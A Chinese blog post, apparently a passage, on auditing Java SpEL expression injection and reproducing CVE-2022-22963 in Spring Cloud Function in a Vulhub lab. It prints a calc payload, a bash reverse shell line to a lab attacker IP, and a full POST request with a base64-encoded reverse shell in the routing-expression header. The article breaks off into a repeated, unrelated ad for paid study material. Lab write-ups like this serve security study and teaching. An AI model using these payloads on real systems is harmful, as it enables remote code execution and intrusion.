Java代码审计之SpEL表达式注入漏洞分析_spel 代码审计

最新推荐文章于 2024-05-05 20:51:43 发布
最新推荐文章于 2024-05-05 20:51:43 发布
阅读量759 收藏 23
点赞数 15
分类专栏: 2024年程序员学习 文章标签: java 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63174618/article/details/137479873
版权

上述控制器逻辑很简单,我添加了三个路由:

路由配置是否存在 SpEL 注入漏洞
/spel1不指定 EvaluationContext ,默认是 StandardEvaluationContext
/spel2指定上下文 StandardEvaluationContext
/spel3指定上下文 SimpleEvaluationContext

4、接下来直接运行 SpringBoot 项目,即可在本地 8081 端口成功访问到 Web 服务:
在这里插入图片描述
在这里插入图片描述
5、接下来根据我们配置的路由来验证漏洞,Payload为:/spelX?input=T(Runtime).getRuntime().exec("calc")
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
从上面简单而直观的漏洞示例代码可以看出,在不指定 EvaluationContext 或者显示采用 StandardEvaluationContext 作为上下文的时候,如果 SpEL 表达式的值可被外部输入所控制,则存在因 SpEL 表达式注入导致 RCE 的风险。

CVE-2022-22963

接下来通过复现、调试分析一个 SpEL 表达式注入 CVE 漏洞来进一步学习、理解此类漏洞,此处挑选的是 CVE-2022-22963

漏洞简述

Vulhub官方文档所述:Spring Cloud Function 提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像 Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。

2022年3月,Spring Cloud 官方修复了一个 Spring Cloud Function 中的 SPEL 表达式注入漏洞,由于 Spring Cloud Function中 RoutingFunction 类的 apply 方法将请求头中的 “spring.cloud.function.routing-expression” 参数作为 SpEL 表达式进行处理,造成了 SpEL 表达式注入漏洞,攻击者可利用该漏洞远程执行任意代码。

【受影响版本】3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

参考链接:

  1. CVE-2022-22963 漏洞描述
  2. CVE-2022-22963 官方漏洞修复方案
  3. Spring Cloud Function SPEL表达式注入漏洞分析

环境搭建

本文使用 Ubuntu 官方虚拟机 + Vulhub CVE 漏洞靶场环境 复现该漏洞。以前的漏洞复现文章已经写过 Vulhub 靶场的使用步骤:渗透测试-Openssl心脏出血漏洞复现

整体复述一下,Ubuntu 上安装 Docker 环境和搭建 Vulhub 靶场的步骤:

1、安装docker:
   apt-get install -y docker.io
2、安装docker-compose:
   pip install docker-compose
3、启动docker后台服务:
   sudo service docker start
4、将当前用户加入docker组
   sudo usermod -aG docker $USER
5、配置 docker 加速器(提高容器下载速度):
   https://blog.csdn.net/feiying0canglang/article/details/126491715
6、下载vulhub漏洞目录:
   git clone https://github.com/vulhub/vulhub.git
7、进入想要复现的漏洞对应文件夹:
   cd ~/vulhub/struts2/s2-048/(示例路径)
8、以root身份执行以下命令开始运行漏洞容器:
   docker-compose up -d

回顾 Docker 用法请参考历史博文:渗透测试-Docker容器

【推荐】提高 Docker 镜像下载速度请参考:Docker–提高下载速度的方法

此处顺便再简单总结下 Docker 常用命令:

目的命令
在Docker公用仓库搜索镜像docker search bwapp(容器镜像名)
从Docker公用仓库拉取镜像docker pull raesene/bwapp(远程镜像路径)
返回本地Docker容器镜像信息docker images
将镜像运行为一个真正在运行的容器docker run -d -p 8080:80 本地容器镜像名
查看正在运行的容器docker ps
查看所有容器(无论是否正在运行)docker ps -a
查看指定容器的详细信息docker inspect 容器名或id
进入容器的shell交互模式docker exec -i -t 容器id bash
停止正在运行的容器docker stop 容器id
重启本地已停止运行的容器docker start 容器id
强制删除本地容器docker rm -f 容器ID

Ubuntu 虚拟机成功搭建环境如下:
在这里插入图片描述
物理机访问 Docker 服务(http://192.168.171.129:8080/):
在这里插入图片描述

反弹shell

先说下这个漏洞产生的原因:如果在 /functionRouter 的 POST 请求头中添加一个 spring.cloud.function.routing-expression 参数,Spring Cloud Function 会直接将参数值带入 SpEL 中查询导致 SpEL 注入。

那我们直接在 POST 请求中发送反弹 Shell 的命令即可,此处使用同一局域网中的 Kali 虚拟机作为攻击机(192.168.171.128):

bash -i >& /dev/tcp/192.168.171.128/6666 0>&1

但是需要使用 reverse-shell 在线工具 将上述反弹 shell 的命令进行 Base64 编码(具体原因请参见:Java反弹shell小记):
在这里插入图片描述
直接发送报文:

POST /functionRouter HTTP/1.1
Host: 192.168.171.129:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}")
Connection: close
Content-Length: 6

test

在这里插入图片描述

【题外话】此处顺便补充一个小技巧,BurpSuite 如果显示字体模糊、分辨率不佳的情况下(比如此图,伤眼睛啊……),可以在桌面快捷方式右键选择“属性”,在兼容性中选择如下配置项后重启即可解决(效果可参见下文另外的 Burp 截图):
在这里插入图片描述
此时 Kali 攻击机可获得反弹的 Shell(其中 1832.168.171.129 正是 Ubuntu 靶机的局域网 IP):在这里插入图片描述
至此,我们已成功复现该漏洞,通过 SpEL 注入实现了 RCE 远程命令执行。

最后,结束 Ubuntu 虚拟机靶场容器环境的运行:
在这里插入图片描述

CVE漏洞调试分析

简单的复现漏洞并不是目的,我们的目的是从历史 CVE 漏洞中分析根因,并尽可能能够实现在白盒代码审计实战中做到举一反三。

本地搭建

此处采用本地 IDEA 新建 SpringBoot 项目的方式来搭建漏洞环境,直接沿用前文 “案例演示” 章节中的简易 SpringBoot 项目。

不想折腾的话可以直接在 Github 获取来源的漏洞环境项目:Spring-Cloud-Function-Spel

1、只需要在 pom.xml 中新增引入 spring-boot-starter-webspring-cloud-function-web(存在漏洞的 3.2.2 版本):

<dependency>
	<groupId>org.springframework.boot</groupId>
	<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
	<groupId>org.springframework.cloud</groupId>
	<artifactId>spring-cloud-function-web</artifactId>
	<version>3.2.2</version>
</dependency>

在这里插入图片描述
2、接着在 application.properties 配置文件中添加spring.cloud.function.definition=functionRouter(此配置也可以不配,非必需)
在这里插入图片描述

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数Linux运维工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年Linux运维全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Linux运维知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip1024b (备注Linux运维获取)
img

,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Linux运维知识点,真正体系化!**

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip1024b (备注Linux运维获取)
[外链图片转存中…(img-EsR8EpYH-1712498184529)]

软件开发Java
关注
  • 15
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SpEL 表达式注入漏洞
m0_61506558的博客
10-31 605
在Spring系列产品中,SpEL表达式计算的基础,实现了与Spring生态系统所有产品无对接。Spring框架的核心功能之一就是通过依赖注入的方式来管理Bean之间的依赖关系,而SpEL可以方便快捷的对中的Bean进行属性的装配和提取。由于它能够在运行时动态分配值,因此可以为我们节省大量Java代码。使用Bean的ID来引用Bean可调用方法和访问对象的属性可对值进行算数、关系和逻辑运算可使用正则表达式进行匹配可进行集合操作。
Java安全-注入漏洞(SQL注入、命令注入表达式注入、模板注入
热门推荐
Love&Share
11-07 1万+
文章目录注入SQL注入JDBC拼接不当造成SQL注入框架使用不当造成SQL注入不安全的反射命令注入代码注入表达式注入Spel表达式注入OGNL表达式注入模板注入 注入 SQL注入 JDBC拼接不当造成SQL注入 JDBC有两种方法执行SQL语句,分别为PrepareStatement和Statement。两个方法的区别在于PrepareStatement会对SQL语句进行预编译,而Statement方法在每次执行时都需要编译,会增大系统开销。理论上PrepareStatement的效率和安全性会比Stat.
2024年Java最新Java代码审计SpEL表达式注入漏洞分析_spel 代码审计(1),Java程序员需要掌握的知识
最新发布
2301_82243769的博客
05-05 572
表达式注入Java 安全中一类常见的能够注入命令并形成 RCE 的漏洞,而常见的表达式注入方式有 EL 表达式注入SpEL 表达式注入和 OGNL 表达式注入等。本文将通过调试分析 CVE-2022-22963 漏洞来入门学习 SpEL 表达式注入漏洞的原理。
java代码审计】命令注入
m0_52923241的博客
02-28 1464
开发者在某种开发需求时,需要引入对系统本地命令的支持来完成某些特定的功能,此时若未对用户的输入做严格的过滤,就可能发生命令注入
【web安全】Spel表达式注入漏洞
一个程序员
01-26 1619
例如,可以执行恶意构造的表达式或者执行类实例对象。在练习靶场的时候遇到了spel表达式注入的题目,这篇文章主要是学习总结一下spel表达式的相关知识点,然后进一步学习spel表达式相关漏洞,了解如何利用改漏洞或者代码审计找到相关漏洞。笔者一开始想直接从spel表达式漏洞入手,可是发现许多描述都不理解,我的java用的不是很多,也不知道表达式的作用是啥,于是我们先学习一下spel表达式使用的知识,再学习相关漏洞spel表达式如果接收外来的参数, 一定要考虑对于非法输入的过滤, 否则会产生注入漏洞
浅入深SpEL表达式注入漏洞总结
snowlyzz的博客
02-07 1379
SpEL基础篇
SPRING CLOUD FUNCTION SPEL表达式注入漏洞测试服务端程序
03-30
用于Spring Cloud Function SPEL表达式注入漏洞测试环境搭建,是编译好的服务端程序,命令号java -jar *.jar运行即可,服务端运行在127.0.0.1:8080端口
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
本文将详细探讨一个重要的安全问题——Spring Cloud Gateway Actuator API 的SpEL(Spring Expression Language)表达式注入漏洞(CVE-2022-22947),该漏洞可能导致命令执行,对系统安全构成严重威胁。首先,我们...
Spring组件开发模式支持SPEL表达式
08-26
Spring框架作为Java企业级应用程序的主流框架,提供了强大的组件开发模式,支持SPEL(Spring Expression Language)表达式,使得开发者能够更加灵活地使用表达式来实现业务逻辑。本文将详细介绍Spring组件开发模式...
Spring spel表达式使用方法示例
08-29
Spel表达式支持各种各样的运算符,可以用于计算表达式的值,例如:(java.lang.Math).random()}"/>,这将调用java.lang.Math类的random()方法,使用其返回值作为randomNumber的值。 4. 正则表达式的匹配 Spel表达式...
如何使用SpEL表达式实现动态分表查询
08-25
在上面的代码中,使用SpEL表达式#{#entityName}来构造动态的SQL语句,根据不同的表名实现动态分表查询。 结论 使用SpEL表达式可以实现动态分表查询,提高了开发效率和系统的灵活性。在实际工作中,可以使用SpEL...
JavaWeb程序代码安全漏洞处理!
08-03
NULL 博文链接:https://eddysoft.iteye.com/blog/1992468
Java Web 工程源代码安全审计实战的第 1 部分.pdf
08-16
本文是JavaWeb工程源代码安全审计实战,基于WebGoat工程,讲解四种高危漏洞:文件路径操纵、系统日志欺骗、线程安全和资源未释放问题。
Spring Cloud Function SpEL表达式注入漏洞分析
include_voidmain的博客
04-06 1961
0x01 影响版本 V3.0.0.M3 - V3.2.2 0x02 漏洞分析 使用该环境进行测试: https://github.com/jwwam/scfunc -依赖版本改成3.2.2查看修复的记录 https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f 看到设置了一个isViaHeader,通过它的值来选择是使用 SimpleEvaluationCont
【web安全】Spring Data Commons 1.13.10 SpEL漏洞分析
HBohan的博客
03-15 1824
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可注入恶意SpEL表达式以执行任意命令,漏洞编号为CVE-2018-1273。
Java代码中的安全漏洞解决合集(更新中)
纯码农的博客
03-01 1230
汝之观览,吾之幸也!本文主要讲解Java的一些安全漏洞,并且给出浅知的解决方案。
Java 代码审计常用漏洞总结
LANXIAMAO的博客
06-18 999
但当输入的反序列化的数据可被用户控制,那么攻击者即可通过构造恶意输入,让反序列化产生非预期的对象,在此过程中执行构造的任意代码。download 函数把 filePath 处的文件写到 http 响应中,在整个流程中并没有对文件名的合法性进行检查,存在任意文件下载漏洞,如通过把 affixalName 的值设置。主要代码审计方法是跟踪用户输入数据和敏感函数参数回溯:跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑可以是一个函数,或者是条小小的条件判断语句。
JAVA框架漏洞
weixin_68408599的博客
06-14 1236
此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。漏洞原因:我们请求的URL在整个项目的传入传递过程。Apache Shiro框架提供了Remember Me功能,用户登录成功后会生成经过加密并编码的Cookie,即使关闭了浏览器,再次访问时无需进行登录操作即可以之前的身份访问网站。漏洞的出现就在URL1,URL2和URL3 有可能不是同一个URL,这就导致我们能绕过shiro的校验,直接访问后端需要首选的URL。
SpringBoot SpEL表达式注入漏洞-分析与复现
06-02
SpringBoot SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码,从而导致应用被攻击。下面我将对该漏洞进行分析与复现。 一、漏洞分析 SpringBoot中的SpEL(Spring Expression Language)是一种基于表达式的语言,用于在运行时动态地计算值或执行逻辑。SpEL表达式可以用于访问对象的属性、调用对象的方法、进行条件判断等操作。在SpringBoot中,SpEL表达式可以用于注解中的属性值、配置文件中的属性值等场景。 在SpEL表达式中,可以使用一些特殊的语法来引用Bean对象或调用Bean对象的方法。例如,可以使用`#{beanName.methodName()}`的语法来调用Bean对象的方法。如果在SpEL表达式中使用了未经过滤的用户输入,就会存在SpEL表达式注入漏洞。 攻击者可以通过构造恶意的SpEL表达式,将其注入到应用中,从而执行恶意代码。例如,可以将`#{T(java.lang.Runtime).getRuntime().exec('calc')}`注入到应用中,从而在受害者机器上执行计算器程序。 二、漏洞复现 下面我将通过一个简单的漏洞复现来说明SpEL表达式注入漏洞的危害性。 1. 创建一个SpringBoot应用 首先,我们需要创建一个SpringBoot应用。可以使用Spring Initializr来快速创建一个基本的SpringBoot应用。 2. 添加注解 在创建好的SpringBoot应用中,我们可以添加一个Controller类,并在其中添加一个RequestMapping注解。在RequestMapping注解中,我们可以使用SpEL表达式来引用Bean对象或调用Bean对象的方法。 ```java @RestController public class MyController { @RequestMapping("/test") public String test() { return "hello world"; } @RequestMapping(value = "/{name}", method = RequestMethod.GET) public String sayHello(@PathVariable("name") String name) { return "Hello " + name + "!"; } @RequestMapping(value = "/spel", method = RequestMethod.GET) public String spel() { String expression = "#{T(java.lang.Runtime).getRuntime().exec('calc')}"; ExpressionParser parser = new SpelExpressionParser(); Expression exp = parser.parseExpression(expression); return exp.getValue().toString(); } } ``` 在上述代码中,我们在/spel接口中使用了SpEL表达式来调用Runtime.getRuntime().exec方法,从而执行计算器程序。 3. 启动应用 启动应用后,访问/spel接口,可以看到计算器程序被成功执行。 4. 防范措施 为了防范SpEL表达式注入漏洞,我们可以采取以下措施: 1. 对用户输入进行过滤和验证,避免未经过滤的用户输入被注入SpEL表达式中。 2. 尽量避免在注解或配置文件中使用SpEL表达式。 3. 对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。 4. 在应用中禁用动态表达式功能,避免SpEL表达式被执行。 5. 总结 SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码。为了防范该漏洞,我们需要对用户输入进行过滤和验证,避免未经过滤的用户输入被注入SpEL表达式中。同时,尽量避免在注解或配置文件中使用SpEL表达式,对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值